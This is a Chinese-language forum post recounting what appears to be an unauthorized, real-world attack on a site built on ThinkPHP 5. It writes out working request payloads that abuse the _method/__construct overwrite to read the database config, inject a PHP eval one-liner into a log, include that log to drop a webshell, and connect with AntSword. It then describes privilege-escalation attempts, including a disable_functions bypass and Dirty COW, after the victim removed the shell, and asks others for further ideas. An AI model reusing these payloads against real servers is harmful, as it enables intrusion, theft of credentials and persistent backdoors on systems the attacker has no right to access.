实战TP5RCE

zhaorong · 发表于 WEB前端技术 2020-7-30 14:35:52


	主要是thinkphp\library\think\request.php中的method函数出现的问题在Method方法中将表单伪装变量对该方法的变量进行覆盖，可以实现对该类的所有函数进行调用。首先从url中的pub路径大致就可以判断出是thinkphp的框架我们让他报个错看看路径和版本号都显示出来了网上可以搜索公开的漏洞利用方式， _method=__construct&method=GET&filter[]=readfile&get[]=../application/database.php 读取数据库配置文件 method=__construct&method=get&filter[]=call_user_func&server[]=phpinfo&get[]=<?php eval($_POST['1']);?> 往log文件中写入一句话 method=__construct&method=get&filter[]=think\__include_file&get[]=../runtime/log/202007/28.log& 1=file_put_contents('a.php','<?php eval($_POST[1]);?>'); 执行一句话生成php木马蚁剑连接webshell 数据库的阿里云的设置了白名单所以访问不了，考虑下一步提权该站点使用的宝塔对一些系统的命令做了禁止虚拟终端执行不了命令可以利用php7的php7-backtrace-bypass https://github.com/mm0r1/exploits 来进行绕过这个我之前利用的时候是可以的，但是这次我被发现了把webshell给我删了，ip也给我ban了，开了代理还是被删了。我在阿里云搭了一个1：1的环境模拟一下想试一下脏牛提权，结果也被阿里云ban了，大佬们有什么思路可以分享一下啊。